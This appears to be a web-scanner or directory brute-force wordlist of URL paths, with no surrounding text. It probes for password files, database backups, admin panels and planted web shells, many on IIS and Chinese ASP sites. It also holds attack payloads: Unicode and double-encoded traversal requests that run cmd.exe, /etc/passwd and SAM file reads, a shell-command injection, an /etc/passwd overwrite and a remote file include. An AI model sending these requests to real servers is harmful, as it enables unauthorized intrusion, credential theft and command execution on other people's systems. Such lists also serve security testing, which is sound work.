/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/mole.cfm
/cfdocs/root.cfm
/cfdocs/snippets/
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/toxic.cfm
/cfdocs/zero.cfm
/cfide/
/cfide/administrator
/cfide/administrator/
/cfide/administrator/index.cfm
/cfide/administrator/startstop.html
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgibin/rosjlwk
/class
/cliente
/clients.asp
/clients.cfg
/clients.cgi
/clients.dat
/clients.data
/clients.db
/clients.dbf
/clients.exe
/clients.htm
/clients.html
/clients.htx
/clients.ini
/clients.lst
/clients.php3
/clients.pl
/clients.txt
/club/msbilllog.txt
/cmd.exe
/cmd.exe?/c+dir
/cmd.exe?/c+dir%20c:\
/cmd1.exe
/cmd1.exe?/c+dir
/cmd32.exe
/com1
/com2
/com3
/com4
/common/browser.inc
/con/con
/config.sys
/config/admpw
/config/checks.txt
/config/config.txt
/config/html
/config/html/cnf_gi.htm
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/conn.asp.bk
/conn.inc.bak
/conn.inc.bk
/connect
/count.cgi
/counter
/counter.inc
/counter.inc.bak
/counter.inc.bk
/d/root.exe?/c+dir
/dat/
/data/passwords
/database.nsf
/database.nsf/
/database/.htpasswd
/dbconnect.asp.bak
/dbconnect.asp.bk
/dbconnect.inc
/dbconnect.inc.bak
/dbconnect.inc.bk
/default.asp%2e
/default.asp%2e%41sp
/default.asp%3f+.htr
/default.asp%81
/default.asp+.htr
/default.asp.
/default.asp::$data
/default.asp\
/default.asp\\
/del/
/demo
/directory
/document
/document/
/documents
/documents/
/domcfg.nsf
/domcfg.nsf/
/domlog.nsf
/domlog.nsf/
/download.cgi
/edit.pl
/etc/.bash_history
/etc/.sh_history
/etc/hosts
/etc/motd
/etc/passwd
/etc/passwd|mail
/etc/shadow
/example/
/examples//web-inf/
/examples/applications/bboard/bboard_frames.html
/examples/jsp/num/numguess.js%70
/exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/exchange/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/exchange/..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/exchange/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
/exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/feedback.htm
/feedback.txt
/file.html
/file/index.jsp
/file/login.jsp
/forum_admin/
/forums
/foto
/ftp.log
/gbook.cgi
/gbook/gbook.cgi
/global.asa%3f+.htr
/global.asa%3f+.htr\
/global.asa+.htr
/global.asa.1
/global.asa.2
/global.asa.bak
/global.asa.bk
/global.asa.old
/global.asa\
/guest.htm
/guestbook.cgi
/guestlog.htm
/handler
/head.css
/hits.txt
/home.html
/homepage.nsf
/homepage.nsf/$defaultnav
/hosts.dat
/htaccess
/htbin/
/htpasswd.txt
/htpasswrd
/htsearch
/http1.0/
/iisadmin
/iisadmin/
/iisadmpwd
/iisadmpwd/
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iisadmpwd/cmd.exe
/iisadmpwd/cmd1.exe
/iisadmpwd/sensepost.exe
/iisamples/sdk
/iishelp
/iishelp/iis/misc/iirturnh.htw
/iissamples
/iissamples/
/iissamples/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/iissamples/exair/howitworks
/iissamples/exair/howitworks/code.asp
/iissamples/exair/howitworks/codebrw1.asp
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/howitworks/codebrws.asp?source=/index.asp
/iissamples/exair/howitworks/codebrws.asp?source=/login.asp
/iissamples/exair/howitworks/showcode.asp
/iissamples/exair/search
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/advsearch.asp::$data
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qfullhit.htw?ciwebhitsfile=/../../winnt/system32/config/system.log&cirestriction=none&cihilitetype=full
/iissamples/exair/search/qsumrhit.htw
/iissamples/exair/search/query.asp
/iissamples/exair/search/query.idq
/iissamples/exair/search/search.asp
/iissamples/exair/search/search.idq
/iissamples/iissamples/fastq.idq
/iissamples/iissamples/oop/qfullhit.htw
/iissamples/iissamples/oop/qsumrhit.htw
/iissamples/iissamples/query.asp
/iissamples/iissamples/query.idq
/iissamples/sdk/asp/docs/codebraws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/%c0%ae%c0%ae/default.asp
/iissamples/sdk/asp/docs/showcode.asp
/iisstart.asp
/imagemap.exe
/imagenes
/img
/imgs
/import
/inc/conn.asp.bak
/inc/conn.asp.bk
/inc/conn.inc.bak
/inc/conn.inc.bk
/inc/counter.inc
/inc/counter.inc.bak
/inc/counter.inc.bk
/inc/dbconnect.asp
/inc/dbconnect.asp.bak
/inc/dbconnect.asp.bk
/inc/dbconnect.inc
/inc/dbconnect.inc.bak
/inc/dbconnect.inc.bk
/inc/sendmail.inc
/include/config.txt
/include/conn.asp
/include/conn.asp.bak
/include/conn.asp.bk
/include/conn.inc
/include/conn.inc.bak
/include/conn.inc.bk
/include/counter.inc
/include/counter.inc.bak
/include/counter.inc.bk
/include/css.css
/include/dbconnect.asp
/include/dbconnect.asp.bak
/include/dbconnect.asp.bk
/include/dbconnect.inc
/include/dbconnect.inc.bak
/include/dbconnect.inc.bk
/include/global.inc
/include/head.html
/include/inc
/include/inc/
/includes/global.inc
/index%252easp
/index%252ejsp
/index%2easp
/index%2ejsp
/index.as%70
/index.asp%2e
/index.asp%2e%41sp
/index.asp%3f+.htr
/index.asp%3f.jsp
/index.asp%81
/index.asp+.htr
/index.asp.
/index.asp::$data
/index.asp\
/index.asp\\
/index.cgi
/index.html.bak
/index.html~
/index.jhtml
/index.js%2570
/index.js%70
/index.jsp
/index.jsp%00
/index.jsp%20
/index.jsp%2e
/index.jsp%2e..
/index.jsp%3f+.htr
/index.jsp%3f.jsp
/index.jsp%3f/
/index.jsp%81
/index.jsp.
/index.jsp..
/index.jsp../
/index.jsp.bak
/index.jsp.jsp
/index.jsp/
/index.jsp/%3f
/index.jsp\
/index.php%00
/index.php/
/index.php3
/index.php3.%5c../..%5cconf/httpd.conf
/index.php?chemin=..%2f..%2f..%2f..%2f..%2f..%2f%2fetc
/index.php?file=../../../../../../etc/passwd
/index.php?file=/etc/passwd
/index.php?page=../../../../etc/passwd
/index.php~
/index2.html
/index3.html
/informacion
/information
/input.bat
/isapi/tstisapi.dll
/jave
/jrun
/jun/.htpasswd
/ksh
/lccon.nsf
/level/19/exec/
/level/20/exec/
/level/25/exec/
/level/30/exec/
/level/35/exec/
/level/40/exec/
/level/42/exec/show%20conf
/level/45/exec/
/level/50/exec/
/level/55/exec/
/level/60/exec/
/level/65/exec/
/level/70/exec/
/level/75/exec/
/level/80/exec/
/level/85/exec/
/level/90/exec/
/lez.html
/lfgstats.htm
/lfgstats.html
/lib
/lib/
/linux/
/list-cgi/counter.dll
/list.asp.bak
/live/htpasswd
/loadpage.cgi
/log.html
/log.nsf
/log.nsf/
/log.shtml
/log.txt
/log/access.log
/logfile
/logfile.htm
/logfile.html
/logfile.txt
/logfile/
/logfiles
/logfiles/
/logger
/logger.html
/logger/
/logging
/logging/
/login.asp%3f+.htr
/login.asp.bak
/login.asp.bk
/login.asp?+.htr
/login.cgi
/login.dat
/login.data
/login.db
/login.dbf
/login.exe
/login.htx
/login.ini
/login.jsp.bak
/login.jsp.bk
/login.lst
/login.php.bak
/login.php.bk
/login.pl
/login.pl.bak
/login.pl.bk
/login.txt
/login/webgood/g7223173.htm
/logs
/logs.html
/logs.shtml
/logs.txt
/logs/
/logs/access.log
/logs/access_log
/logs/mk_output/referer.html
/lotus/domino/notes.ini
/mail\admin.nsf
/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
/main.asp%
/main.asp%2e
/main.asp%2e%41sp
/main.asp%3f.htr
/main.asp%81
/main.asp+.htr
/main.asp.
/main.asp.bak
/main.asp::$data
/main.asp\
/main.asp\\
/main.cgi
/manage.asp.bak
/master/passwdfile
/member/pass/.htpasswd
/member/private/.htpasswd
/memberfiles
/memberpro/.htpasswd
/members-only/.htpasswd
/members/.htpasswd
/members/.splitinfinity
/members/htusers
/members/stats.cgi
/members/users
/members/users/.htpasswd
/membersonly/.htpasswd
/menu.asp.bak
/ministats/admin.cgi
/mmstdod.cgi
/modules.php
/modules.php?name=members_list&&sql_debug=1
/mp3/
/msadc
/msadc/
/msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/msadc/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
/msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/msadc/cmd.exe
/msadc/cmd1.exe
/msadc/msadc.dll
/msadc/msadcs.dll
/msadc/readme.txt
/msadc/root.exe?/c+dir
/msadc/samples
/msadc/samples/adctest.asp
/msadc/samples/selector/codebrws.asp
/msadc/samples/selector/codebrws.cfm
/msadc/samples/selector/showcode.asp
/msadc/samples/selector/showcode.asp_2
/msadc/sensepost.exe
/mtaforms.nsf
/mysql
/mysql/
/names.nsf
/names.nsf/open
/netauth.cgi
/netscape
/network_query.php?portnum=80&querytype=all&target=www.someserver.com%3bls+-l&submit=do+it
/news.cgi
/news/news.cgi
/newsdesk.cgi
/nph-test-cgi
/null.dll
/null.html
/null.htw
/null.htw?ciwebhitsfile=/global.asa%20&cirestriction=none&cihilitetype=full
/null.htw?ciwebhitsfile=/index.asp%20&cirestriction=none&cihilitetype=full
/null.ida
/null.idc
/null.idq
/null.printer
/number
/number/
/odbc
/oekaki/oekaki.cgi?mode=administration
/oetaki/oekakibbs.conf
/officescan/cgi/jdkrqnotify.exe
/ofs
/ofs.web
/ofs.web-charge
/ofs/.htpasswd
/onrequestend.cfm
/oordir
/oordir/.htpasswd
/opendir.php
/opendir.php?requesturl=/etc/passwd
/opt/casp/admin/conf/hkey.current.user
/opt/netscape/suitespot/admin-serv/config/admpw
/oradata
/order
/order/order.log
/orders
/orders.htm
/orders.log
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/orders/order.log
/orders/order_log_v12.dat
/orders/orders.log
/orders/orders.txt
/orders/results
/outgoing
/ovcgi/openview5.exe
/owa_util.signature
/ows-bin/*.bat
/ows-bin/owa/owa%5futil.signature
/ows-bin/perlidlc.bat
/ows-bin/perlidlc.bat?&dir
/page.cfm
/pagelog.cgi
/pages/bb_smilies.php
/pals-cgi
/pals-cgi?palsaction=restart&documentname=/bin/id
/pass.cfg
/pass.cgi
/pass.dat
/pass.db
/pass.dbf
/pass.exe
/pass.htm
/pass.htx
/pass.lst
/pass.php3
/pass.pl
/pass/password_manager/passwords/1.passwords
/pass67/.htpasswd
/passes
/passes/.htpasswd.nkmd
/passfile
/passwd
/passwd.txt
/password.cfg
/password.cgi
/password.dat
/password.data
/password.db
/password.dbf
/password.exe
/password.htm
/password.html
/password.htx
/password.ini
/password.log
/password.lst
/password.php3
/password.pl
/passwords.asp
/passwords.cfg
/passwords.cgi
/passwords.data
/passwords.db
/passwords.dbf
/passwords.exe
/passwords.htm
/passwords.html
/passwords.lst
/passwords.php3
/passwords.pl
/passwords.txt
/passwords/msbilllog.txt
/passwrd
/passwrd.txt
/pbserver/
/pbserver/pbserver.dll
/pccsmysqladm
/pccsmysqladm/incs/dbconnect.inc
/perl
/perl.exe
/perl/
/phone/
/phorum/common.php
/photoads
/photoads/ads_data.pl
/photoads/cgi-bin/
/photoads/cgi-bin/env.cgi
/php
/php.cgi
/php/
/php/php.exe
/php/php.exe?c:\winnt\repair\sam
/php/php4ts.dll
/php3
/php3/
/php4
/php4/
/phpbb/bb_memberlist.php?sortby=user_regdate
/phpbb/bb_smilies.php
/phpbb/prefs.php
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/phplib/page.php?_phplib[libdir]=http://www.china.com/
/phpmyadmin/config.inc.php
/phpmyadmin/sql.php?btndrop=no&goto=/etc/passwd
/phpmyadmin/tbl_copy.php
/phpmyadmin/tbl_create.php
/phpphotoalbum/explorer.php
/phpphotoalbum/getalbum.php
/phprocketaddin/?page=../../../../etc/passwd
/phpshell.php
/pic.html
/piranha/secure/passwd.php3
/pix
/porno
/porno/
/port
/ports/
/ppwd/temp
/prd.i/pgen
/pre
/private.html
/private/.htpasswd
/private/htpasswd
/privates/members.pwd
/prn
/process_bug.cgi
/prod
/product.asp
/program+files/analogx/simpleserver/www/server.log
/proxy/loginresponse
/public_html_members.htpasswd
/publisher
/publisher/
/publisher/|publisher
/readme.nsf
/readmec.nsf
/readmes.nsf
/redir.pl
/redirect.cgi
/redirect.pl
/registered
/remote_login.pl%20
/report.html
/reseller
/restricted
/restricted/.htpasswd
/retail
/reviews.php
/reviews/newpro.cgi
/rguest.exe
/right.asp
/right.asp.bak
/rightfax/fuwww.dll
/rightfax/fuwww.dll/
/roads/cgi-bin/search.pl
/roads/cgi/search.pl
/rsh
/rwwwshell.pl
/sales
/sam
/sam._
/sample
/sample.asp
/sample.jhtml.
/sample.jhtml\
/sample\faqw46.nsf
/sample\framew46.nsf
/sample\pagesw46.nsf
/sample\siregw46.nsf
/sample\site1w46.nsf
/sample\site2w46.nsf
/scripts/wwwthreads/3tvars.pm
/scripts/wwwthreads/w3tvars.pm
/scripts/zsh
/search.cgi
/search.dll
/search.dll?search?query=%00&logic=and
/search.dll?search?query=/&logic=and
/search.pl
/search.vts
/search/advsearch.asp
/search/query.asp
/search/search.asp
/search97.vts
/search97cgi/vtopic
/secret.txt
/secret/secret/add-user.shmtl
/secret/secret/change-passwd.shtml
/secret/secret/sql_tool.shtml
/secure/.htaccess
/secure/.htpass
/secure/.wwwacl
/secure/aaa
/secured/.htaccess
/secured/msbilllog.txt
/sell
/sensepost.exe
/server%+logfile
/server+logfile
/serverlogfile
/servicio
/servlet
//servlets/count.jsp
/servlets/counter.jsp
/servlets/jrun.exe
/servlets/servletrunner.exe
/session
/session/adminlogin
/session/admnlogin
/set.html
/setpasswd.cgi
/setup.nsf
/sh
/shadow
/shop.cgi
/shop.pl
/shopper
/shopper.cgi
/showfile.asp
/site/eg/source.asp
/site/iissamples
/sites/knowledge/membership/inspired/viewcode.asp
/sites/knowledge/membership/inspiredtutorial/viewcode.asp
/sites/samples/knowledge/membership/inspired/viewcode.asp
/sites/samples/knowledge/membership/inspiredtutorial/viewcode.asp
/sites/samples/knowledge/push/viewcode.asp
/sites/samples/knowledge/search/viewcode.asp
/siteserver/publishing/viewcode.asp
/smdata.dat
/smtpibwq.nsf
/smtpobwq.nsf
/snort2html.html
/sojourn.cgi
/solaris
/something.stm
/squirrelspell/modules/check_me.mod.php?sqspell_app[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
/src
/srchadm
/ss.cfg,ncl_items.html
/ssi
/ssi/envout.bat
/staff
/stat.htm
/statistic
/statrep.nsf
/stats.htm
/stats.html
/stats.txt
/stats408.nsf
/stats855.nsf
/status
/status.cgi
/store.cfg
/store.cgi
/store.dat
/store.data
/store.db
/store.dbf
/store.exe
/store.htm
/store.html
/store.htx
/store.ini
/store.lst
/store.php3
/store.pl
/store.txt
/storedb
/stuff.html
/submit.cgi
/submit.php?conf=anything
/subscribe.pl
/subscribe.pl?test@test.com
/sults_test/testorder.txt
/super_stats/access_logs
/support/common.php
/tar
/tcsh
/technote/main.cgi/oops
/technote/main.cgi/oops?board=free_board&command=down_load&filename=/../../../main.cgi
/technote/print.cgi
/technote/technote/print.cgi
/temp.htm
/temp.html
/temporal
/test.html
/test/test.cgi
/textcounter
/textcounter.pl
/today.nsf
/tools/newdsn.exe
/tree.dat
/update.cgi
/update.pl
/uploader.exe
/user.dat
/user.log
/user.php&op=saveuser
/usermanage.asp.bak
/userreg.cgi?cmd=insert</=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
/userreg.cgi?cmd=insert>/etc/passwd
/users.cfg
/users.cgi
/users.dat
/users.data
/users.db
/users.dbf
/users.exe
/users.html
/users.htx
/users.ini
/users.lst
/users.php3
/users.pl
/users.pwd
/users.txt
/users/.htpasswd
/users/scripts/submit.cgi
/usingdonews/
/usr/local/apache/share/htdocs/.htaccess
/viewpage.php?file=/etc/passwd
/vti_bin/cmd.exe
/vti_bin/cmd1.exe
/vti_bin/sensepost.exe
/vti_cnf/cmd.exe
/vti_cnf/cmd1.exe
/vti_cnf/sensepost.exe
/vti_pvt/administrators.pwd
/vti_pvt/authors.pwd
/vti_pvt/users.pwd
/webmaster_logs
/webmin
/webplus
/webplus.cgi
/websendmail
/webshop
/webshop/logs/cc.txt
/webshop/logs/ck.log
/webshop/templates/cc.txt
/website
/webstar
/webstart+log
/wguest.exe
/whatsnew
/whois.cgi
/whois_raw.cgi
/widenet
/win.ini
/windmail.exe
/work/passwd.txt
/ws_ftp.ini
/ws_ftp.log
/wsftp.log
/www-sql
/wwwboard.pl
/wwwboard/passwd.txt
/wwwboard/wwwadmin.cgi
/wwwboard/wwwadmin.pl
/wwwstats
/wwwstats.html
/yabb.pl
/zipfiles
/zsh
/~
/~.htaccess
/~.htpasswd
/~.passwd
/~adm
/~administrator
/~bin
/~cgi
/~cgi-bin
/~cgi-win
/~dat
/~data
/~database
/~dev
/~etc
/~ftp
/~guest
/~home
/~htaccess
/~html
/~htpasswd
/~ibill
/~lancelot
/~log
/~log/access.log
/~logs
/~logs/access.log
/~lp
/~mnt
/~named
/~nobody
/~nobody/etc
/~ofs
/~oracle
/~passwd
/~passwrd
/~pre
/~root
/~sbin
/~stats
/~sys~
/~temp
/~test
/~tmp
/~usr
/~uucp
/~var
\\../readme.txt
/addmember
/adduser
/admin_del
/admin_delete
/admin_edit
/adminadduser
/admindel
/admindelete
/adminmember
/admintab
/loginok
/savelogin
/loginerror
/logout
/editmember
/edituser
/login_admin
/login_out
/reg_upload
/add_user
/cipher
/pwd.txt
/alert.txt
/密码.txt
/帐号.txt
/重要.txt
/mirserver.rar 
/mp3/lrc.asp 
/web.rar 
/www.rar 
/favicon.gif 
/wwwroot.rar 
/mp3/song.asp 
/packet.mdb 
/HYTop.mdb 
/HSH.mdb 
/bbs/ 
/data.rar 
/qq.txt 
/diy.asp 
/bbs/diy.asp 
/z9v8qq.txt 
/aba/images/left_bg_top.gif 
/qq.asp 
/wolserver.rar 
/z9v8qq.asp 
/jinhuQQ.txt 
/z9v8jinhuQQ.txt 
/jinhuQQ2007.txt 
/z9v8jinhuQQ2007.txt 
/z9v8qq2008jh.txt 
/qq2008jh.txt 
/tmdqq.asp 
/log.txt 
/z9v8tmdqq.asp 
/database/PowerEasy2006.mdb 
/z9v8log.txt 
/wwwroot.zip 
/eWebEditor/admin_login.asp 
/upfile_flash.asp 
/www.zip 
/bbs/z9v8diy.asp 
/web.zip 
/z9v8diy.asp 
/admin/upfile_flash.asp 
/admin/editor/admin_login.asp 
/manage/webeditor/admin_login.asp 
/admin/htmleditor/admin_login.asp 
/editor/admin_login.asp 
/myup.asp 
/webeditor/admin_login.asp 
/admin/webeditor/admin_login.asp 
/eWeb/admin_login.asp 
/manage/edit/admin_login.asp 
/WebEdit/admin_login.asp 
/UserReg.asp 
/edithtml/admin_login.asp 
/manage/eWebEditor/admin_login.asp 
/admin/htmledit/admin_login.asp 
/ewindoweditor/admin_login.asp 
/admin/edit/admin_login.asp 
/manage/editor/admin_login.asp 
/admin/eWebEditor/admin_login.asp 
/manage/eWeb/admin_login.asp 
/admin/eWeb/admin_login.asp 
/admin/WebEdit/admin_login.asp 
/htmledit/admin_login.asp 
/htmleditor/admin_login.asp 
/include/upfile_flash.asp 
/edit/admin_login.asp 
/admin/SouthidcEditor/admin_login.asp 
/FCKeditor/editor/filemanager/browser/default/browser.html 
/tomdb.mdb 
/bbs/digshell2.asp 
/admin/editor/db/ewebeditor.mdb 
/digshell2.asp 
/digshell0.asp 
/eWebEditor/db/ewebeditor.mdb 
/admin/htmledit/db/ewebeditor.mdb 
/bbs/digshell0.asp 
/database/PowerEasy5.mdb 
/uppic/ 
/z9v8flashFXP.zip 
/ftp.zip 
/z9v8ftp.zip 
/upload_flash.asp 
/z9v8upload_flash.asp 
/flashFXP.zip 
/bbs/index.php 
/uploadfiles/569853.asp 
/uploadfile/569853.asp 
/aba/images/top_sitelink_bg.gif 
/mp3/favicon.gif 
/editor/db/ewebeditor.mdb 
/webeditor/db/ewebeditor.mdb 
/manage/editor/db/ewebeditor.mdb 
/z_shop_newshop.asp 
/manage/ewebeditor/db/ewebeditor.mdb 
/bbs/update.asp 
/bbs/read.php 
/update.asp 
/eWebEditor/z9v8admin_login.asp 
/bbs/z9v8update.asp 
/z9v8z_shop_newshop.asp 
/z9v8myup.asp 
/z9v8update.asp 
/cmirserver.rar 
/z9v8conn.asp 
/inc/z9v8conn.asp 
/bbs/robots.txt 
/bbs/bbs/robots.txt 
/conn.asp 
/inc/conn.asp 
/bbs/bbs/index.php 
/attachment.php 
/images/4.rmvb 
/mirserver.zip 
/viewthread.php 
/Mirserver2.rar 
/mirserver1.rar 
/MirServer3.rar 
/manage_news/upload.asp 
/scan/scan.asp 
/scan/z9v8scan.asp 
/tot-asp-scan/scan.asp 
/tot-asp-scan/z9v8scan.asp 
/mirserver.exe 
/manage/login.asp 
/up_BookPicPro.asp 
/data/data.mdb 
/DKserver.rar 
/z9v8plus/infosearch.php 
/shopxp_data/data.mdb 
/plus/infosearch.php 
/new/admin/edit/db/ewebeditor1013.mdb 
/admin/login.asp 
/database/venshop.mdb 
/z9v8ASPAdmin_A.asp 
/admin/htmleditor/upload.asp 
/ASPAdmin_A.asp 
/htmleditor/upload.asp 
/play,7 
/ds/Main.asp 
/ASPAdmin.asp 
/z9v8ASPAdmin.asp 
/admin/z9v8md5.asp 
/inc/md5.asp 
/inc/z9v8md5.asp 
/bbs/forum/index.php 
/admin/z9v8login.asp 
/users/Editer/SelectPic.asp 
/bbs/data/shop.asp 
/bbs/forum/robots.txt 
/bbs/forum/masingle.php 
/scan.asp 
/bbs/forum/template/admin/notice.htm 
/ewebeditor/upload.asp 
/bbs/bbs/template/admin/notice.htm 
/users/Editer/z9v8SelectPic.asp 
/bbs/forums/masingle.php 
/bbs/forums/robots.txt 
/admin/z9v8conn.asp 
/admin/z9v8config.asp 
/bbs/masingle.php 
/include/z9v8config.asp 
/include/z9v8conn.asp 
/database/ 
/admin/md5.asp 
/inc/config.asp 
/config.asp 
/z9v8AdminMain.asp 
/include/z9v8md5.asp 
/md5.asp 
/AdminMain.asp 
/bbs/forums/template/admin/notice.htm 
/database/z9v8 
/include/conn.asp 
/include/md5.asp 
/bbs/forums/index.php 
/bbs/data/z9v8shop.asp 
/bbs/template/admin/notice.htm 
/login.asp 
/z9v8md5.asp 
/inc/z9v8config.asp 
/include/config.asp 
/admin/config.asp 
/admin/conn.asp 
/bbs/bbs/masingle.php 
/z9v8login.asp 
/z9v8scan.asp 
/z9v8config.asp 
/manage/z9v8login.asp 
/lingyitansuo/ 
/catalog/game.htm 
/setup/index.php 
/ftp.rar 
/include/dialog/login.php 
/admin/ewebeditor/upload.asp 
/Jianzhan_Sheji/ 
/liaotian_qq/ 
/down.html 
/data/Joekoe_CMS_4.0.mdb 
/FooSun_Data/FooSun_Data.mdb 
/KS_Data/KesionCMS4.mdb 
/cache/adminlogin_logs.php 
/zhaoshangjiameng/ 
/kuanpin_yingshi/ 
/Sousuo_Yinqing/ 
/bbs/cmd.asp 
/bizhi_tuku/ 
/tiyu_jianshen/ 
/dongman_katong/ 
/Mianfei_Ziyuan/ 
/Yinshua_Chuban/ 
/fangchanjiaju/1761.htm 
/dianshidiantai/751.htm 
/data/dvbbs8.mdb 
/shouji_tongxing/ 
/nanshi_nvxing/ 
/data/buk/cnmai.mdb 
/css.asp 
/luntan_shequ/ 
/difangfuwu/ 
/bbs/myup.asp 
/bbs/data/dvbbs8.mdb 
/xiangce-heka/ 
/flashFXP.rar 
/bbs/css.asp 
/fangchanjiaju/ 
/catalog/tool.htm 
/caipiaobocai/ 
/Junshi_Zixun/ 
/shenghuopinpai/ 
/Zhengfu_Jigou/ 
/shishangmeirong/ 
/shaonian_ertong/ 
/Jianzhu_Jiancai/ 
/cmd.asp 
/Fangzhi_Pige/ 
/wangshanggouwu/ 
/boke_wangzhai/ 
/chuguo_liuxue/ 
/Ziyuan_Xiazai/ 
/Fuzhuang_Fushi/ 
/lvyouchuxing/ 
/Heike_Anquan/ 
/NBA_lanqiu/ 
/youmo_XiaoHua/ 
/Shangwu_Maoyi/ 
/api/insenz.php 
/yishu_aihao/ 
/Nonglin_Muyu/ 
/log.asp 
/kaoshi_zhaosheng/ 
/yingyangmeishi/ 
/wenxue_xiaoshuo/ 
/Zuqiu_Tianxia/ 
/Galv_Fagui/ 
/waiyu_xuexi/ 
/chongwuhuaniao/ 
/upfile_other.asp 
/Guowai_Wangzhan/ 
/tool/translate.htm 
/bbs/key.asp 
/jijinlicai/ 
/z9v8css.asp 
/Huanbao_Lvhua/ 
/shell.asp 
/Keji_IT/ 
/bbs/z9v8digshell2.asp 
/Index.asp 
/bbs/z9v8key.asp 
/admin/Databackup/NewCloud_Backup.MDB 
/Jixie_Dianzi/ 
/data/dvbbs6.mdb 
/z9v8123.txt 
/Data/MeskyDMS_Data.mdb 
/user/User_Login.asp 
/database/snowboy.mdb 
/passport_client.php 
/data/scadata.mdb 
/images/yesitis.asp 
/z9v8log.asp 
/z9v8cmd.asp 
/Yingjian_Zixun/ 
/bbs/z9v8upfile.asp 
/bbs/data/dvbbs7.mdb 
/bbs/z9v8digshell0.asp 
/Gongye_Zhipin/ 
/bbs/z9v8css.asp 
/tool/chaxun.htm 
/shouji_tongxing/Wap_Wangzhi.htm 
/xiao.asp 
/z9v8up_BookPicPro.asp 
/data/dvbbs7.mdb 
/z9v8passport_client.php 
/aiqing_jiaoyou/ 
/bbs/admin.php 
/conn.asp.bak 
/z9v8key.asp 
/bbs/bbs/admin.php 
/qvod.rar 
/Databases/myszw.mdb 
/bbs/upfile.asp 
/z9v8upfile.asp 
/bbs/z9v8myup.asp 
/Foosun_Data/FS400.mdb 
/user/z9v8User_Login.asp 
/panfile.asp 
